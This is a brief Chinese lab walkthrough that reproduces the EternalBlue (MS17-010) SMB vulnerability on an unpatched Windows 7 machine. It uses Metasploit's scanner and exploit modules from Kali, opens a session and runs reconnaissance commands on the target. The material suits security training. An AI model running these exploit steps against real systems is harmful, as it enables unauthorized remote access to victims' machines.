复现环境:
- 靶机:windows7(IP:192.168.8.145) 存在永恒之蓝的漏洞。
- 攻击机:kali-linux(IP:192.168.8.139)。
- 实验条件:两台机器之间可以相互ping通,并且windows7机器(无补丁)开启了445端口且防火墙是关闭的。
复现过程:
1.打开MSF,输入命令:msfconsole打开msf后找msf的脚本,输入命令:search ms17-010 。
#搜索msf中和ms17-010漏洞有关的脚本
2.使用ms17-010的辅助性脚本:use auxiliary/scanner/smb/smb_ms17_010。 3.配置ms17-010的辅助性脚本。
查看有哪些项需要进行配置:show options
配置要攻击的靶机的ip地址:set rhosts 192.168.8.145
配置完成后,执行ms17-010的辅助性脚本:run #运行模块。
4.使用ms17-010攻击性模块:use exploit/windows/smb/ms17_010_eternalblue。
5.查看配置项:show options。
设置被攻击机器ip:set rhosts 192.168.8.145
运行ms17-010攻击模块:run
攻击完成成功建立会话。
6.得到靶机的shell。
7.进入终端可以利用一些常见的命令,得到靶机的信息。
例如:systeminfo#查看靶机信息、ipconfig #查看靶机网络配置、ps #查看靶机正在运行的进程
8.页面如果出现了中文乱码问题,输入:chcp 65001 可解决乱码问题。
以上就完成了对永恒之蓝漏洞的复现操作,希望可以帮助到大家。